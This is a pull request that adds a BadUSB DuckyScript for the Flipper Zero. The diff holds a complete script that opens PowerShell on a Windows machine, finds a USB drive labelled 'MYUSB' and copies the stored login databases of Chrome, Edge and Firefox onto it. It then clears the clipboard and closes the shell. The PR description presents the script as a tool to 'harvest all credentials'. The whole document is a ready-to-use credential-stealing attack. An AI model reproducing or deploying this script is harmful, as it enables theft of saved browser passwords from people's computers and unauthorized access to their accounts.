### PR TITLE
Credential Harvester For Flipper

### DIFF
--- a/BadUSB/CredentialHarvesterByMarkCyber
+++ b/BadUSB/CredentialHarvesterByMarkCyber
@@ -1,0 +1,62 @@
+REM This script was created by github.com/MarkCyber
+REM Harvests all credentials from chrome, edge, and firefox
+REM This script requires a secondary USB named "MYUSB" to save credentials to
+REM The extracted data will require decryption
+
+REM Set delay for Flipper Zero
+DELAY 1000
+
+REM Open PowerShell with elevated privileges
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+DELAY 1000
+
+REM Check if the USB drive exists
+STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
+STRING if ($usbDrive -ne $null) {
+ENTER
+DELAY 500
+STRING cd $usbDrive;
+ENTER
+DELAY 500
+STRING mkdir BrowserData;
+ENTER
+DELAY 500
+STRING cd BrowserData;
+ENTER
+DELAY 500
+
+REM Copy Chrome Login Data to USB
+STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
+STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
+ENTER
+DELAY 500
+
+REM Copy Firefox Login Data to USB
+STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
+STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
+ENTER
+DELAY 500
+
+REM Copy Edge Login Data to USB
+STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
+STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
+ENTER
+DELAY 500
+STRING }
+ENTER
+DELAY 500
+
+REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on targetPC)
+STRING echo off | clip
+ENTER
+DELAY 500
+
+REM Close PowerShell
+STRING exit
+ENTER
+DELAY 500
+REM Check out my other badusb scripts on github.com/MarkCyber


### PR DESCRIPTION
This is a badUSB script for the flipper zero that will harvest all credentials from google chrome, firefox and edge, and saves it to a secondary usb that is to be named "MYUSB" for further analysis. 